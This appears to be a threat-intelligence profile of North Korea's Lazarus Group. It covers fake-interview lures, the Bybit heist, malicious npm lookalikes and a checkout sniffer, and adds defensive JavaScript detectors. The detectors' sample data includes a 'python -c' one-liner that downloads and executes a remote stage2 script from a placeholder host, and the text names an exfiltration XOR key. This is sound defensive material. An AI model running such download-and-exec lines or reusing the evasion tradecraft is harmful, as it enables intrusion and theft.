
Lazarus Group is a state-sponsored advanced persistent threat organization attributed to the Democratic People’s Republic of Korea (DPRK), active since at least 2007. The group conducts dual-mandate operations combining espionage-driven intelligence collection with large-scale financially motivated cybercrime, including cryptocurrency exchange heists, e-commerce payment interception, and supply chain compromise. What differentiates Lazarus from other nation-state APTs is its simultaneous pursuit of strategic intelligence and direct revenue generation at global scale, targeting crypto exchanges, energy utilities, government institutions, science and engineering firms, and software and IT companies across five industries on every continent. Group-IB’s Threat Intelligence platform continuously tracks the group’s campaigns, tooling, and infrastructure through its Masked Actors threat actor profiles.
Geographic scope: Global; historical emphasis on US and South Korea for espionage; no geographic constraint for financial operations
Group-IB tracking: Masked Actors threat actor profile (Threat Intelligence platform)
The Contagious Interview campaign has been Lazarus’s most operationally significant effort since 2024. Group-IB’s analysis of APT Lazarus: Eager Crypto Beavers, Video Calls and Games confirms the campaign was “going full steam ahead” through 2024, with operators targeting cryptocurrency and technology professionals through fake job interviews.
The attack chain proceeds through four documented stages:
The campaign’s focus on developers is strategic: a compromised engineer at a crypto exchange provides direct access to the assets the group seeks to steal, while a compromised open-source contributor can seed malicious code across the entire downstream dependency chain. The gaming-related lures target blockchain game and NFT developers, extending the attack surface into an adjacent sector with direct crypto exposure.
Lazarus has not slowed down. Through 2024 and into 2025, we tracked the Contagious Interview campaign evolving its tooling with Python-based scripts, fake video call setups, and social engineering lures targeting crypto professionals. What makes this group dangerous is the speed at which they iterate on delivery mechanisms, so defenders need threat intelligence that maps these shifts in near real time rather than relying on static IOC lists that go stale within days.
In February 2025, Lazarus Group breached cryptocurrency exchange Bybit in the largest crypto heist ever attributed to a single threat actor. Public reporting placed losses at roughly US$1.5 billion. The attack demonstrates the group’s capability to target high-value centralized exchange infrastructure and convert stolen assets at scale, consistent with the regime’s use of cryptocurrency theft as a primary sanctions-evasion mechanism.
Group-IB’s Six Supply Chain Attack Groups to Watch Out for in 2026 documents the Bybit breach as originating from compromised Safe{Wallet} infrastructure rather than a direct strike on the exchange itself: a compromised Safe{Wallet} developer machine allowed JavaScript to be injected into the wallet’s web front end, so that Bybit’s signers approved a transaction different from the one displayed to them. This reflects a consistent pattern: Lazarus identifies exchanges with gaps in cold wallet signing procedures or in upstream software dependencies, establishes persistent access through social engineering or supply chain entry points, and executes the final asset transfer when conditions are optimized for maximum extraction with minimum detection time. The practical lesson is that a multi-signature cold wallet is only as trustworthy as the software that renders the transaction to its signers; independent verification of the calldata on a hardware device, outside the web front end, is the control that would have surfaced the substitution.
Group-IB’s Six Supply Chain Attack Groups to Watch Out for in 2026 documents Lazarus operating at scale across open-source ecosystems, publishing malicious npm packages that mimic widely used libraries including is-buffer, eslint, redux, and react-related tools. Developers install these packages as part of the Contagious Interview campaign — unknowingly deploying BeaverTail, a JavaScript-based credential and cryptocurrency wallet stealer, alongside InvisibleFerret, a Python backdoor enabling persistent access and data exfiltration. In multiple waves across 2025, Group-IB identified dozens of malicious packages, some using crypto-clipping techniques that silently redirect digital asset transfers to attacker-controlled wallets.
To reach developers at scale, Lazarus builds convincing fake personas on LinkedIn and GitHub, complete with employment histories, code repositories, and contribution activity. These personas funnel targets into weaponized repositories or into the fake interview pipeline. According to Group-IB’s HTCT 2026 report, supply chain attacks have become the dominant force reshaping the global cyber threat landscape — and Lazarus’s npm operations represent exactly the industrialized form of this model: one poisoned package reaching thousands of developers who install it as a trusted dependency.
In parallel with high-value exchange heists, Lazarus operates the BTC Changer JavaScript sniffer, which intercepts cryptocurrency payments at e-commerce checkout by silently modifying wallet addresses to redirect funds to attacker-controlled accounts. This lower-profile, steady-revenue operation runs alongside the group’s larger campaigns.
Lazarus combines high-investment social engineering with technically sophisticated evasion to conduct long-duration intrusions against well-defended targets. The Contagious Interview methodology exploits deeply embedded professional trust norms, while the group’s evasion investment reflects the operational requirements of maintaining access across extended campaigns.
Sharmine Low, Malware Analyst at Group-IB APAC and contributor to Group-IB’s Lazarus threat intelligence research, notes that the group’s cross-platform tooling evolution, from Windows-focused implants to Python-based scripts and macOS extended attribute abuse, provides a persistent behavioral fingerprint that aids attribution even as individual indicators rotate rapidly.
Documented evasion techniques include: living-off-the-land via legitimate system utilities to avoid spawning suspicious new processes; multi-stage payload delivery where each stage is fetched only after the previous one validates the environment; FTP-based exfiltration with XOR encryption (key G01d*8@("); and compartmentalized C2 communications using actor-registered domains mimicking legitimate services.
The practical implication for defenders is that no single detection layer is sufficient against this adversary. Lazarus’s kill chain is specifically designed to appear benign at each individual stage, with the full attack only becoming visible when multiple telemetry sources are correlated. This makes comprehensive endpoint visibility combined with Threat Intelligence-driven behavioral baselines a prerequisite for reliable detection, rather than a nice-to-have capability.
Lazarus Group is attributed to the Democratic People’s Republic of Korea (DPRK). Group-IB’s Masked Actors threat actor profile records Heritage: DPRK, with first observed activity in 2007 and global operational scope.
The 2016 Bangladesh Bank heist provided early technical corroboration: IP addresses used in the SWIFT fraud were traced back to North Korean infrastructure, a finding subsequently confirmed by the FBI. Group-IB’s own investigation of Lazarus infrastructure independently identified North Korean IP addresses in the C2 chain, traced to Pyongyang’s Potonggang District where the National Defence Commission is located. The UN Security Council Panel of Experts has directly linked DPRK cyber operations to the regime’s weapons procurement budget, providing geopolitical corroboration independent of technical analysis.
As noted above, Sharmine Low, Malware Analyst at Group-IB APAC, observes that the group’s cross-platform tooling evolution provides a persistent behavioral fingerprint that survives rapid indicator rotation, which is why behavioral overlap carries more attribution weight than any individual domain or hash.
Reactive detection is insufficient against an actor with Lazarus’s resources and iteration speed. The Contagious Interview campaign demonstrates that Lazarus retools delivery mechanisms faster than static IOC lists can be updated, making Threat Intelligence-driven behavioral detection the only reliable approach. Group-IB’s Threat Intelligence platform provides the operational foundation for this anticipatory defense. The following four controls, in priority order, address Lazarus’s most consistently observed initial access, persistence, and collection techniques across documented campaigns.
Flag Python interpreters (python, python3, pythonw and their versioned variants) whose parent process is a video call client, browser, or professional networking application, or whose script path sits under a downloads or temp directory rather than a project checkout. The Contagious Interview campaign consistently delivers infection via Python scripts presented as coding tests. This single detection rule addresses the most active Lazarus initial access vector; tune it against legitimate developer tooling (IDEs, terminals, CI agents) so the false-positive rate stays manageable.
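The control above, as an added example that is not code from Group-IB or from the original page: a small triage routine over process-creation telemetry that implements the three conditions just described (suspicious parent, script under an untrusted directory, and a `python -c` one-liner that pulls a second stage over HTTP). The telemetry field names (image, parentImage, commandLine), the parent-process list and the sample events are constructed assumptions, not real incident data; the same conditions can be encoded as a Sigma or EDR rule.

```javascript
// Added example (not Group-IB's code): triage of process-creation events for
// Python interpreters started from contexts a developer's normal workflow rarely
// produces. Field names and sample events are constructed assumptions.

const PYTHON_IMAGE = /(^|[\\\/])(python|pythonw|python3|python3\.\d+)(\.exe)?$/i;
// Browsers, video-call and messaging clients, and the LinkedIn desktop app:
// parents that should not be launching an interpreter on a "coding test".
const SUSPICIOUS_PARENT = /(^|[\\\/])(chrome|msedge|firefox|safari|zoom|teams|slack|discord|telegram|skype|linkedin)(\.exe)?$/i;
// Script paths under download/temp locations rather than a project checkout.
const UNTRUSTED_DIR = /[\\\/](downloads|desktop|temp|tmp)[\\\/]/i;

function basename(p) { return p.split(/[\\\/]/).pop(); }

// First argument that looks like a script file, honouring quoted paths.
function scriptArgument(commandLine) {
  const tokens = commandLine.match(/"[^"]*"|\S+/g) || [];
  for (const tok of tokens.slice(1)) {
    const t = tok.replace(/^"|"$/g, '');
    if (/\.pyw?$/i.test(t)) return t;
  }
  return null;
}

function classifyEvent(ev) {
  const reasons = [];
  if (!PYTHON_IMAGE.test(ev.image)) return { alert: false, reasons };
  if (SUSPICIOUS_PARENT.test(ev.parentImage)) {
    reasons.push('python spawned by ' + basename(ev.parentImage));
  }
  const script = scriptArgument(ev.commandLine);
  if (script && UNTRUSTED_DIR.test(script)) {
    reasons.push('script executed from untrusted directory: ' + script);
  }
  // "python -c" one-liners that fetch a second stage over HTTP(S).
  if (/\s-c\s/.test(ev.commandLine) && /https?:\/\//i.test(ev.commandLine)) {
    reasons.push('inline code fetching a remote URL');
  }
  return { alert: reasons.length > 0, reasons };
}

function triageEvents(events) {
  return events.map(ev => ({ ...ev, ...classifyEvent(ev) })).filter(r => r.alert);
}

// Constructed sample telemetry (paths and URL are placeholders, not IOCs).
const SAMPLE_EVENTS = [
  { image: 'C:\\Users\\dev\\AppData\\Local\\Programs\\Python\\Python312\\python.exe',
    parentImage: 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe',
    commandLine: '"C:\\Users\\dev\\AppData\\Local\\Programs\\Python\\Python312\\python.exe" "C:\\Users\\dev\\Downloads\\coding-test\\run.py"' },
  { image: '/usr/local/bin/python3.12',
    parentImage: '/Applications/Slack.app/Contents/MacOS/Slack',
    commandLine: 'python3.12 /tmp/interview-task/main.py' },
  { image: '/usr/bin/python3',
    parentImage: '/usr/share/code/code',
    commandLine: 'python3 /home/dev/projects/api/app.py' },
  { image: 'C:\\Python312\\python.exe',
    parentImage: 'C:\\Windows\\explorer.exe',
    commandLine: 'python.exe -m pip install requests' },
  { image: 'C:\\Windows\\System32\\notepad.exe',
    parentImage: 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe',
    commandLine: 'notepad.exe' },
  { image: '/usr/bin/python3',
    parentImage: '/usr/bin/bash',
    commandLine: 'python3 -c "import urllib.request as u;exec(u.urlopen(\'https://example.invalid/stage2.py\').read())"' },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const hit of triageEvents(SAMPLE_EVENTS)) {
    console.log(basename(hit.image) + ' <- ' + basename(hit.parentImage) + ': ' + hit.reasons.join('; '));
  }
}
```

Of the six constructed events, three are flagged: the browser-launched script from Downloads (two reasons), the Slack-launched script from /tmp, and the inline download-and-exec one-liner; the VS Code-launched project script, the pip invocation and the non-Python process are left alone. The parent list is the part most worth maintaining from threat intelligence as the campaign's lure applications change.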
Lazarus publishes packages mimicking is-buffer, eslint, redux, and react-related libraries. Runtime dependency scanning, lockfile pinning, and integrity verification for open-source packages are required to detect BeaverTail and InvisibleFerret before installation. Note that pinning and integrity hashes only guarantee you install the exact bytes you reviewed; they say nothing about whether the package itself is a lookalike, so pair them with name-distance checks against widely used libraries and with review of install-time hooks (npm install --ignore-scripts disables the preinstall/install/postinstall scripts that malicious packages commonly use as their execution point).
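An added example of the lockfile side of this control (not code from Group-IB, npm, or the original page): an audit over a package-lock.json (lockfile v2/v3 "packages" map) that reports dependencies without an integrity hash, dependencies resolved from somewhere other than the public registry, dependencies that declare an install script, and names within two edits of the libraries named above. The watchlist, the sample lockfile and the package names in it (is-bufer, esllint) are constructed for the example.

```javascript
// Added example (not Group-IB's code): package-lock.json audit for pinning,
// integrity, registry origin, install scripts and lookalike names.
// The watchlist and the sample lockfile below are constructed assumptions.

const WATCHLIST = ['is-buffer', 'eslint', 'redux', 'react', 'react-dom', 'react-redux'];
const REGISTRY = 'https://registry.npmjs.org/';

// Levenshtein distance, single-row dynamic programming.
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = above;
    }
  }
  return row[b.length];
}

// Returns the watchlist name a package is within two edits of, or null.
// An exact watchlist match is the genuine library and is not flagged.
function lookalike(name) {
  const bare = name.replace(/^@[^/]+\//, '');
  if (WATCHLIST.includes(bare)) return null;
  for (const w of WATCHLIST) {
    if (editDistance(bare, w) <= 2) return w;
  }
  return null;
}

function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === '' || meta.link) continue; // root project and workspace links
    const name = meta.name || path.replace(/^.*node_modules\//, '');
    if (!meta.integrity) {
      findings.push({ name, issue: 'no integrity hash: install is not pinned to reviewed bytes' });
    }
    if (!meta.resolved || !meta.resolved.startsWith(REGISTRY)) {
      findings.push({ name, issue: 'resolved outside the public registry: ' + (meta.resolved || '(none)') });
    }
    if (meta.hasInstallScript) {
      findings.push({ name, issue: 'runs an install script (preinstall/install/postinstall)' });
    }
    const target = lookalike(name);
    if (target) findings.push({ name, issue: 'name is within two edits of "' + target + '"' });
  }
  return findings;
}

// Constructed sample lockfile; hashes are placeholders, not real digests.
const SAMPLE_LOCK = {
  name: 'checkout-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'checkout-app',
          dependencies: { react: '^18.3.1', 'left-pad': '^1.3.0', 'is-bufer': '^1.0.3', esllint: '^1.2.0' } },
    'node_modules/react': { version: '18.3.1',
      resolved: 'https://registry.npmjs.org/react/-/react-18.3.1.tgz', integrity: 'sha512-CONSTRUCTED_HASH_A' },
    'node_modules/left-pad': { version: '1.3.0',
      resolved: 'https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz', integrity: 'sha512-CONSTRUCTED_HASH_B' },
    'node_modules/is-bufer': { version: '1.0.3',
      resolved: 'https://registry.npmjs.org/is-bufer/-/is-bufer-1.0.3.tgz', integrity: 'sha512-CONSTRUCTED_HASH_C' },
    'node_modules/esllint': { version: '1.2.0',
      resolved: 'https://example.invalid/esllint-1.2.0.tgz', hasInstallScript: true },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  const file = process.argv[2];
  const lock = file ? JSON.parse(require('fs').readFileSync(file, 'utf8')) : SAMPLE_LOCK;
  for (const f of auditLockfile(lock)) console.log(f.name + ': ' + f.issue);
}
```

Run it as `node audit.js package-lock.json` in a CI step and fail the build on any finding. Against the constructed lockfile it reports five issues: one lookalike finding for is-bufer and four for esllint (no integrity, non-registry tarball, install script, lookalike), while react and left-pad pass. The edit-distance threshold will flag some legitimate neighbours of very short names, which is acceptable for a review gate but should be paired with an allowlist of already-vetted packages.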
BTC Changer operates client-side; standard server-side WAFs do not catch it. Monitor checkout page JavaScript for runtime modifications to wallet address fields and for outbound POST requests to non-origin domains. A Content-Security-Policy with a tight connect-src and form-action additionally blocks the exfiltration request in the browser even when the injected script does run, and is a cheaper control than runtime monitoring alone.
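An added example of the runtime side of this monitoring (not code from Group-IB, BTC Changer, or the original page): two checks that implement the signals just named, a rendered payment address that no longer matches the server-issued value, and a POST leaving the page origin, plus the browser wiring that feeds them from a MutationObserver and from fetch/XMLHttpRequest hooks. The page origin, the allowed payment-provider origin, the data-pay-address selector, the report endpoint and the recorded session are constructed assumptions.

```javascript
// Added example (not Group-IB's code): checkout-page monitor for address
// tampering and non-origin POSTs. Origins, selector and session data are assumed.

const ALLOWED_ORIGINS = ['https://payments.example']; // assumed legitimate PSP

// Null when the request is fine, otherwise a description of the problem.
function isNonOriginPost(request, pageOrigin, allowed = ALLOWED_ORIGINS) {
  if (String(request.method || 'GET').toUpperCase() !== 'POST') return null;
  let origin;
  try {
    origin = new URL(request.url, pageOrigin).origin; // relative URLs resolve to the page
  } catch (e) {
    return 'unparseable request URL: ' + request.url;
  }
  if (origin === pageOrigin || allowed.includes(origin)) return null;
  return 'POST to non-origin host ' + origin;
}

// The expected address must come from the server-side order record, never from
// the DOM, because the DOM is exactly what a sniffer rewrites.
function checkAddressField(expected, observed) {
  const value = String(observed || '').trim();
  if (value === expected) return null;
  return 'payment address changed from ' + expected + ' to ' + (value || '(empty)');
}

// Replays a recorded session: address snapshots taken on each DOM mutation of
// the address element and every request seen by the fetch/XHR hooks.
function evaluateCheckoutSession(session) {
  const alerts = [];
  for (const snap of session.addressSnapshots) {
    const a = checkAddressField(session.expectedAddress, snap.value);
    if (a) alerts.push({ t: snap.t, alert: a });
  }
  for (const req of session.requests) {
    const a = isNonOriginPost(req, session.origin);
    if (a) alerts.push({ t: req.t, alert: a });
  }
  return alerts;
}

// Constructed session: placeholder addresses and hosts, not real ones.
const SAMPLE_SESSION = {
  origin: 'https://shop.example',
  expectedAddress: 'bc1q-merchant-address-constructed',
  addressSnapshots: [
    { t: 0, value: 'bc1q-merchant-address-constructed' },
    { t: 1800, value: 'bc1q-attacker-address-constructed' },
  ],
  requests: [
    { t: 200, method: 'POST', url: '/api/order' },
    { t: 300, method: 'GET', url: 'https://cdn.shop.example/checkout.js' },
    { t: 1900, method: 'POST', url: 'https://payments.example/charge' },
    { t: 1950, method: 'post', url: 'https://stats.example/collect' },
  ],
};

// Browser wiring; inert under Node. Assumes the merchant renders the address in
// an element carrying data-pay-address with the server-issued value.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const report = (alert) =>
    navigator.sendBeacon('/security/checkout-report', JSON.stringify({ alert, href: location.href }));
  const field = document.querySelector('[data-pay-address]');
  if (field) {
    const expected = field.dataset.payAddress;
    new MutationObserver(() => {
      const a = checkAddressField(expected, field.textContent);
      if (a) report(a);
    }).observe(field, { childList: true, characterData: true, subtree: true });
  }
  const origFetch = window.fetch;
  window.fetch = function (input, init) {
    const url = typeof input === 'string' ? input : input.url;
    const method = (init && init.method) || (typeof input === 'object' && input.method) || 'GET';
    const a = isNonOriginPost({ method, url }, location.origin);
    if (a) report(a);
    return origFetch.apply(this, arguments);
  };
  const origOpen = XMLHttpRequest.prototype.open;
  XMLHttpRequest.prototype.open = function (method, url) {
    const a = isNonOriginPost({ method, url }, location.origin);
    if (a) report(a);
    return origOpen.apply(this, arguments);
  };
}
```

On the constructed session the replay yields two alerts: the address swap at 1800 ms and the POST to stats.example; the relative same-origin POST, the CDN GET and the allowlisted payment-provider POST pass. Two caveats: if the address is rendered in an input element rather than text, its value property is not a DOM mutation and must be polled; and a sniffer loaded before this script can hook fetch first, which is why the monitor complements rather than replaces a strict connect-src policy.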
Group-IB's Managed XDR natively embeds malware detonation, providing behavioral analysis of Lazarus-associated samples including Python Contagious Interview payloads and BTC Changer variants without manual triage bottlenecks.
Unlike most nation-state groups that operate with a single mandate, Lazarus simultaneously pursues strategic intelligence collection and large-scale financially motivated cybercrime, including cryptocurrency exchange attacks, e-commerce JS-sniffer deployment, and supply chain compromise at the npm package ecosystem level. This dual mandate across five industries on a global scope is unusual among nation-state APTs, which typically concentrate on a single sector or region. Group-IB’s Threat Intelligence platform differentiates Lazarus from overlapping DPRK-linked clusters through its Masked Actors threat actor profiles, using infrastructure patterns, malware code similarities, and behavioral indicators to maintain attribution confidence even as tooling overlap between state and criminal actors increases.
According to Group-IB’s HTCT 2026 report, supply chain attacks have become “the dominant force reshaping the global cyber threat landscape,” and Lazarus is positioned to intensify this vector through active developer targeting via Contagious Interview and npm ecosystem poisoning. Group-IB analysts expect the group to integrate AI-generated content to scale the operator-intensive fake interview methodology, removing the resource constraint that currently limits per-target engagement. Cross-platform tooling expansion to macOS and Linux will continue as organizations diversify endpoint environments. The cryptocurrency sector will remain the primary financial target given its direct sanctions-evasion utility for the DPRK regime.
Key Takeaway (Group-IB Finding, 2025 to 2026):
Lazarus Group is one of the most operationally versatile state-sponsored threat actors tracked by Group-IB, uniquely combining espionage with large-scale financially motivated cybercrime across five industries (crypto, energy, government, science, and software) on a global scale. According to Group-IB’s HTCT 2026 report, supply chain attacks have become the dominant force reshaping the cyber threat landscape, and Lazarus’s active targeting of software developers through Contagious Interview and malicious npm packages — mimicking is-buffer, eslint, redux, and react-related libraries and deploying BeaverTail and InvisibleFerret — positions it as the primary state-linked npm ecosystem threat in 2026. The group’s February 2025 breach of cryptocurrency exchange Bybit, originating from compromised Safe{Wallet} infrastructure, demonstrates that Lazarus exploits supply chain trust to reach targets that would otherwise be hardened against direct attack. Group-IB’s Masked Actors threat actor profiles and Threat Intelligence platform provide continuously updated tracking of the group’s campaigns, tooling, and infrastructure to enable anticipatory defense.